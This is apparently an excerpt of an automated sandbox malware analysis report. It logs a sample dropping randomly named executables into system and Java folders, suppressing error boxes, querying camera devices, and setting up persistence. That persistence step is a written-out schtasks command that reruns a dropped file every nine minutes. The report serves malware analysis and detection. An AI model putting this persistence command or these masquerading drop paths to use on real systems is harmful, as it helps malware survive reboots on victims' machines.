                                    Source: RuntimeBroker.exe.5.dr Static PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.dr Static PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe0.5.dr Static PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe1.5.dr Static PE information: section name: .text entropy: 7.537640943300724

                                    Persistence and Installation Behavior

                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\user\Desktop\GoOOBNnj.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe File created: C:\Users\user\Desktop\XeElcNfe.log
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe File created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\user\Desktop\IlqWXNCe.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe File created: C:\Users\user\Desktop\HBUOKBdR.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe File created: C:\Users\user\Desktop\ToOuVQfl.log
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe File created: C:\Users\user\Desktop\ebskEcaT.log
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\user\Desktop\QPyLHGSL.log
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\user\Desktop\axSbriXt.log

                                    Boot Survival

                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe Process information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
